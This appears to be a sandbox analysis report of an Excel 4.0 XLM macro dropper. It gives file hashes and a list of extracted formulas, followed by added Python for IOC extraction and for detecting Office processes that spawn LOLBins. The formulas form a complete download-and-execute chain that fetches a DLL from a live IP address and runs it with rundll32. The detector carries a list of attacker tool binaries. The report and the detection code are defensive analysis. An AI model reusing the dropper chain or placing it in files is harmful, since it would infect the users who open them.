General

  • Target

    021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118

  • Size

    101KB

  • Sample

    240427-bmrwjagg5z

  • MD5

    021412d6c7f5d8357ca18623ab41d2c4

  • SHA1

    59807e7fa0de3d3d39db6c154ee3a94c63ffea5f

  • SHA256

    e1fbc397fd27ff212644a632aef8a3ca1debbd7c0327b461fa9e964351a7f421

  • SHA512

    84515748131e55e8bb8442d5fa728f2db3961ac0d8eb23055dbe8ea5b94f56a23ac35a34dd939e134c39161d356956d4d883e0bc6aa9741693f868604db38398

  • SSDEEP

    3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN71:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmI

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://209.141.54.161/crypt.dll

  • Attributes

    formulas (one per cell, in execution order):

      =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0)
      =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0)
      =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0)
      =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0)
      =HALT()
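The formula chain above is a complete download-and-execute dropper: two CreateDirectoryA calls build a staging path, URLDownloadToFileA fetches the DLL from the C2, and ShellExecuteA runs it through rundll32.exe by calling its DllRegisterServer export. The following Python is an added example, not part of the sandbox report or the sample: it parses =CALL(...) formulas of this shape (library, export, XLM type text, then the export's arguments, with Excel's "" quote escaping), maps the three Win32 exports seen here to the IOCs they carry, and reports whether a downloaded file is later executed. The formula list is the one printed above, embedded as constructed input; the argument positions for each export follow the documented Win32 signatures noted in the comments.

```python
import re
from dataclasses import dataclass

# Constructed input: the five formulas this report lists under "Attributes",
# one string per cell, in execution order.
SAMPLE_FORMULAS = [
    r'=CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0)',
    r'=CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0)',
    r'=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0)',
    r'=CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0)',
    r'=HALT()',
]

# One XLM argument: a double-quoted string (Excel escapes a quote as "") or an integer.
ARG_RE = re.compile(r'"((?:[^"]|"")*)"|(-?\d+)')
CALL_RE = re.compile(r'^\s*=CALL\((.*)\)\s*$', re.S)


@dataclass
class XlmCall:
    library: str     # DLL name, e.g. "Kernel32"
    function: str    # exported function, e.g. "URLDownloadToFileA"
    type_text: str   # XLM type text, e.g. "JJCCJJ" (J = long, C = string)
    args: list       # arguments actually passed to the export


def parse_call(formula):
    """Parse one =CALL(...) formula; return None for anything else (=HALT(), =EXEC(), ...)."""
    m = CALL_RE.match(formula)
    if not m:
        return None
    values = []
    for tok in ARG_RE.finditer(m.group(1)):
        if tok.group(1) is not None:
            values.append(tok.group(1).replace('""', '"'))
        else:
            values.append(int(tok.group(2)))
    # The first three CALL arguments (library, export, type text) must be strings.
    if len(values) < 3 or not all(isinstance(v, str) for v in values[:3]):
        return None
    return XlmCall(values[0], values[1], values[2], values[3:])


def extract_iocs(formulas):
    """Walk the formulas in execution order and collect what the macro touches."""
    iocs = {"dirs": [], "urls": [], "dropped_files": [], "exec": []}
    for call in filter(None, map(parse_call, formulas)):
        fn = call.function.lower()
        if fn.startswith("createdirectory") and len(call.args) >= 1:
            # CreateDirectory(lpPathName, lpSecurityAttributes)
            iocs["dirs"].append(call.args[0])
        elif fn.startswith("urldownloadtofile") and len(call.args) >= 3:
            # URLDownloadToFile(pCaller, szURL, szFileName, dwReserved, lpfnCB)
            iocs["urls"].append(call.args[1])
            iocs["dropped_files"].append(call.args[2])
        elif fn.startswith("shellexecute") and len(call.args) >= 4:
            # ShellExecute(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
            params = call.args[3] if isinstance(call.args[3], str) else ""
            iocs["exec"].append(f"{call.args[2]} {params}".strip())
    return iocs


def classify(iocs):
    """'download-and-execute' when a file fetched by URLDownloadToFile is later handed to ShellExecute."""
    dropped = {p.lower() for p in iocs["dropped_files"]}
    if any(p in cmd.lower() for cmd in iocs["exec"] for p in dropped):
        return "download-and-execute"
    if iocs["urls"]:
        return "download-only"
    if iocs["exec"]:
        return "execute-only"
    return "no-known-dropper-api"


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_FORMULAS)
    for kind, items in found.items():
        for item in items:
            print(f"{kind:14s} {item}")
    print("verdict:", classify(found))
```

The matching is on the export name prefix, so the W variants (CreateDirectoryW, URLDownloadToFileW, ShellExecuteW) are covered as well; anything that is not =CALL (for example =EXEC or =REGISTER-based indirection) is ignored by this parser and would need its own handler.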

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://209.141.54.161/crypt.dll

Targets

    • Target

      021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118

    • Size

      101KB

    • MD5

      021412d6c7f5d8357ca18623ab41d2c4

    • SHA1

      59807e7fa0de3d3d39db6c154ee3a94c63ffea5f

    • SHA256

      e1fbc397fd27ff212644a632aef8a3ca1debbd7c0327b461fa9e964351a7f421

    • SHA512

      84515748131e55e8bb8442d5fa728f2db3961ac0d8eb23055dbe8ea5b94f56a23ac35a34dd939e134c39161d356956d4d883e0bc6aa9741693f868604db38398

    • SSDEEP

      3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN71:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmI

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
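The behaviour that triggers this signature is visible in the extracted formulas: EXCEL.EXE hands the downloaded DLL to rundll32.exe via ShellExecuteA, so the Office process gains a child it should never have. The Python below is an added example, not the sandbox's own detection logic: it runs a parent/child rule over constructed process-creation events laid out like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), flags an Office host spawning a living-off-the-land binary, and for rundll32 adds context on the module path and the DllRegisterServer export. The Office-host and LOLBin lists and the three sample events are assumptions made for the example; the third event mirrors the command line from this report.

```python
import ntpath
import re
from dataclasses import dataclass

# Office hosts whose children deserve scrutiny, and the living-off-the-land
# binaries a macro dropper typically hands its payload to. Both sets are
# assumptions for this example, not the sandbox's own rule.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "certutil.exe", "msiexec.exe"}

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# The first two are benign noise; the third mirrors the ShellExecute call in this report.
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": EXCEL,
     "CommandLine": '"' + EXCEL + r'" "C:\Users\user\Downloads\invoice.xls"'},
    {"ParentImage": EXCEL, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ParentImage": EXCEL, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer"},
]

# First argument after the rundll32 image: either a quoted path or a token up to
# whitespace/comma (rundll32 accepts "module,Export" as well as "module Export").
RUNDLL32_MODULE_RE = re.compile(r'rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|([^\s,]+))', re.I)


def rundll32_module(command_line):
    """Return the module path rundll32 was told to load, or None if this is not a rundll32 command line."""
    m = RUNDLL32_MODULE_RE.search(command_line)
    if not m:
        return None
    return m.group(1) or m.group(2)


@dataclass
class Alert:
    parent: str
    child: str
    command_line: str
    reasons: list


def detect(events):
    """Flag Office hosts spawning LOLBins; add context for the rundll32 DllRegisterServer pattern."""
    alerts = []
    for ev in events:
        parent = ntpath.basename(ev["ParentImage"]).lower()
        child = ntpath.basename(ev["Image"]).lower()
        if parent not in OFFICE_HOSTS or child not in LOLBINS:
            continue
        cl = ev["CommandLine"]
        reasons = [f"{parent} spawned {child}"]
        if child == "rundll32.exe":
            module = rundll32_module(cl)
            # A module loaded from outside the Windows directory is the dropper's own payload.
            if module and not module.lower().startswith("c:\\windows\\"):
                reasons.append(f"rundll32 module outside the Windows directory: {module}")
            if "dllregisterserver" in cl.lower():
                reasons.append("DllRegisterServer export invoked (COM registration used as the execution entry point)")
        alerts.append(Alert(parent, child, cl, reasons))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(f"[ALERT] {alert.parent} -> {alert.child}: {alert.command_line}")
        for reason in alert.reasons:
            print("   -", reason)
```

In a real pipeline the same rule would read the events from the EDR or Sysmon channel rather than a list, and the module path check should also catch user-writable locations under C:\Windows (for example the Temp and Tasks directories), which the simple prefix test above deliberately does not attempt.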

MITRE ATT&CK Matrix (ATT&CK v13)

Defense Evasion

  • Modify Registry (T1112): 1

Discovery

  • Query Registry (T1012): 2

  • System Information Discovery (T1082): 2

Tasks